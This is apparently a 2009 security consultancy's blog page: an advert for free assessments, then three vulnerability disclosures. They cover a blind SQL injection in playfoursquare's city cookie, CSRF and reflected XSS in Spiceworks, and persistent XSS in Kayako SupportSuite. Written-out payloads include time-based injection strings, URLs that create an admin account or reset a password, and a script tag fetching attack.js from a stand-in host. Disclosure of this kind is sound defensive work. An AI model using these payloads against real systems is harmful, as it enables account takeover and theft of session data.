Most businesses rely heavily on computers and networks to get work done these days. When your computer or network fails you in some way, that has a direct impact on your bottom line. In an effort to help you understand the risks associated with using these essential pieces of technology in your business, and help mitigate them, we are giving away a whole pile of consulting time in the form of free security assessments.

What do you get with the free assessment?

• 30 minutes of network and website security assessment by the nGenuity team of security ninjas.
• 30 minutes of discussion / debrief about any security issues identified.
• 20% discount on any IT and security consulting and support services through the remainder of 2009.
• No hassle or obligation to purchase anything. This is not a hard sell, this is a free service we are offering to improve awareness on network / website security.

Follow this link for more information on nGenuity’s security assessments.

I already have an “IT” person / company that handles this type of stuff for me.

Chances are your IT person or company is doing a great job supporting you, but what if that isn’t the case and you just haven’t noticed yet? What if security isn’t their thing? nGenuity already works with a few IT providers to complement the services they provide. There is nothing wrong with getting a second opinion from an expert.

Where do I sign up?

Call us at 509-396-2075 and mash the first number that you hear or email us at info@ngenuity-is.com

Look for the ad (designed by &yet) for this free assessment in the Tri-City Area Journal of Business (page 26.)

I stumbled upon a fun little sql injection in playfoursquare the other day. I notified them but have not heard back, but it appears it has been addressed so here are the details.

     It was possible to inject specially crafted SQL into the cookie "cookieCityID"
     which provides 

     If you set the cookie to the value below the query will take roughly 5-7
     seconds to return with this "True" condition (1=1).

     (SELECT IF(1=1,BENCHMARK(1000000,SHA1(1)),0))

     If you change the logic condition to 1=0 (False) the query returns
     immediately demonstrating that blind SQL injection is possible.

     (SELECT IF(1=0,BENCHMARK(1000000,SHA1(1)),0))

III. REFERENCES
     [1] - http://playfoursquare.com

Copyright (c) 2009 nGenuity Information Services, LLC

nGenuity Information Services – Security Advisory

   Advisory ID: NGENUITY-2009-009 - Spiceworks Multiple Vulnerabilities (XSS & CSRF)
   Application: Spiceworks 3.6.31847
        Vendor: Spiceworks
Vendor website: http://www.spiceworks.com
        Author: Adam Baldwin (adam_baldwin@ngenuity-is.com)
         Class: XSS, CSRF

  I. BACKGROUND
     Spiceworks is a network management, monitoring, helpdesk, etc application that
     uses a web based front end.

 II. DETAILS
     Multiple vulnerabilities exist within the Spiceworks platform that can be used
     to take over or otherwise abuse the application / infrastructure.

     These vulnerabilities allow for the following attack scenarios to be executed.

     1. Creation of a new Administrator account
     2. Password reset of users

     Exploit Examples:
     Create Administrator Account:

http://example.com/settings/users/create?user%5Bfirst_name%5D=Joe&user%5Bla

st_name%5D=Nobody&user%5Bemail%5D=user%40example.com&user%5Brole%5D=admin&us
er%5Bpassword%5D=PASSWORD&user%5Bpassword_confirmation%5D=PASSWORD

     User Password Reset:

http://example.com/settings/users/change_password/1?user%5Bpassword%5D=PASSWORD

&editorId=password_entry_for_1

     Edit: 8/10/2009
     Thank you to Melinda Rosario for pointing out that I forgot to include any details on the XSS
     portion of this advisory. It is a simple reflected XSS in the search parameter.

     Example:

http://example.com/search?query=--%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E

     Edit: 8/11/2009
     Per Francis Sullivan at Spiceworks: Update to the latest Spiceworks 4.1 where the security issues
     are addresses.

III. REFERENCES
     [1] - http://www.spiceworks.com
     [2] - http://cwe.mitre.org/data/definitions/79.html
     [3] - http://cwe.mitre.org/data/definitions/352.html

 IV. VENDOR COMMUNICATION
     4.1.2009 - Vulnerability Discovery & Vendor Notification
     4.6.2009 - Second attempt to contact vendor
     4.7.2009 - Initial vendor response
     8.8.2009 - Advisory Release

Copyright (c) 2009 nGenuity Information Services, LLC

nGenuity Information Services – Security Advisory

   Advisory ID: NGENUITY-2009-008 - Ticket Subject Persistent XSS in Kayako SupportSuite
   Application: SupportSuite v3.50.06
        Vendor: Kayako
Vendor website: http://www.kayako.com
        Author: Adam Baldwin (adam_baldwin@ngenuity-is.com)

         Class: Persistent Cross-Site Scripting

  I. BACKGROUND
     "SupportSuite is [Kayako's] flagship product, integrating the ticket and
      e-mail management features of eSupport with the live chat and visitor
      monitoring features of LiveResponse." [1]

 II. DETAILS
     The subject field of a newly created support ticket is not properly encoded before
     being sent to the browser when the ticket details are viewed. More information
     on cross-site scripting please refer to the Common Weakness Enumeration specification
     available cwe.mitre.org [2].

     An example attack might look similar to the following.

     </title><script src="example.com/attack.js"></script>

     This vulnerability is fixed in version 3.60.x

III. REFERENCES
     [1] - http://www.kayako.com
     [2] - http://cwe.mitre.org/data/definitions/79.html

 IV. VENDOR COMMUNICATION
     7.17.2009 - Vulnerability Discovery
     7.20.2009 - Initial Vendor Response
     7.21.2009 - Patch created, Will be pushed to next stable release
     8.08.2009 - Advisory released

Copyright (c) 2009 nGenuity Information Services, LLC